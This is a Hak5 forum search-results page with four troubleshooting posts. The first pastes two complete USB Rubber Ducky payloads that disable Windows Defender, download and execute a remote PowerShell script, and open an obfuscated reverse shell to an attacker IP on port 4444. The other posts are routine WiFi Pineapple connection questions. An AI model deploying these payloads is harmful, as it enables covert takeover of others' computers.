Jump to content

Search the Community

Showing results for tags 'no connection'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • New USB Rubber Ducky
    • WiFi Pineapple
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
    • WiFi Coconut
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • Legacy Devices
    • Classic USB Rubber Ducky
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

Found 4 results

  1. Hello forum members following yotube videos on "Get a Reverse Shell with the USB Rubber Ducky by downloading playloads from https://shop.hak5.org/blogs/payloads/tagged/usb-rubber-ducky+remote-access and REVERSEDUCKY loads," I could not properly make any of the payloads for remote access I did everything like in the videos in this regard and the included payloads on the HAK5 website. Both computers on the same network. I put a rubber ducky into my Windows computer (you can see that something is happening), but on the second computer (the attacker), despite the fact that the server works: python -m http.server 8000 and the second panel nc -l -p 4444. Unfortunately, I cannot connect to Windows through the shell. Payload.ps1 is on the server of course. Does it matter? I also have ESET antivirus installed. I am asking for any tips.Sample loads: REM Turn off Windows Defender and start reverse shell REM DELAY 1000 GUI r DELAY 200 REM Start an elevated powershell instance which will disable Windows Defender. STRING powershell -w hidden start powershell -A 'Set-MpPreference -DisableRea $true' -V runAs ENTER DELAY 1000 REM if you need administrator [left, enter and delay 1000] LEFT ENTER DELAY 1000 ALT y DELAY 1000 GUI r DELAY 100 STRING powershell -w hidden "IEX (New-Object Net.WebClient).DownloadString('http://my_IP/payload.ps1');" ENTER STRING exit ENTER anather loads: REM ReverseDucky2 REM Version 1.3 REM OS: Windows / Linux(?) (Not tested with Powershell on Linux) REM Author: 0iphor13 REM Reverse shell executed in the background REM Fill in Attacker-IP and Port in Line 19 REM DON'T FORGET TO START LISTENER DELAY 1500 GUI r DELAY 500 STRING powershell -NoP -NonI -W hidden DELAY 250 ENTER DELAY 200 STRING $c=nEw-oBjECt SYstEm.NEt.SOcKEts.TCPClIEnt("my_IP",4444);$s=$c.GetSTreAm();[byte[]]$b=0..65535|%{0};whILe(($i=$s DELAY 100 STRING .REad($b,0,$b.LeNgTh))-ne 0){;$d=(NEw-OBjeCT -TYpeNamE sYsTeM.TeXt.ASCIIEncoding).GetStRIng($b,0,$i);$z=(ieX $d 2>&1|oUt DELAY 100 STRING -STriNG);$x=$z+"PS "+(pwd)+"> ";$y=([text.encoding]::ASCII).GEtByTEs($x);$s.WrIte($y,0,$y.LEnGTh);$s.FlUSh()};$c.CloSE() DELAY 100 ENTER
  2. Good day Reader, I have a Nano with firmware 2.5.4. I want to use it as a access point but it doesn't let the internet connection go trough. when I look at the networking > route I see the "kernel ip routing table" and it only shows the br-lan can this be a problem? can the problem be resolved by factory resetting the device? or by just adding the other interfaces in the "kernel ip routing table"? kind regards, bitbot17 PS Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 172.16.42.0 * 255.255.255.0 U 0 0 0 br-lan
  3. I recently purchased wifi pineapple nano and during firmware upgrade my laptop died and now I can not connect to it. I open browser and connection times out.I have tried for many days now to get it to work .I am running Kali. I do not know what to do. Please help!!
  4. I just recently bought the Wifi Pineapple Mark V (via UK) and i am using a Mac Air OS X Yosemite, first 2 days 'everything' worked fine, after that is was running slow and facing problems connecting to 172.16.42.1:1471 If i got a connection and could login, fusions did not load or half?! Or was spinning and spinning around...( i have installed the latest Firmware) Later i was not able to connect to 172.16.42.1:147 at all, i have watched a lot of video's and red many tips, but it was not helping me to fix the issue. It was making me nuts, so i decided to buy a cheap Windows laptop, but even with this new laptop i am not able to connect to 172.16.42.1:147 anymore? Does anyone is facing the same problems with a Mac Air OS X Yosemite? Or does anyone could help me out? Is it possible (because of the Mac Air problems) that even on a different device (Windows) is am not able to connect anymore to 172.16.42.1:147 from my IP or other IP? All suggestions or tips are welcome!
×
×
  • Create New...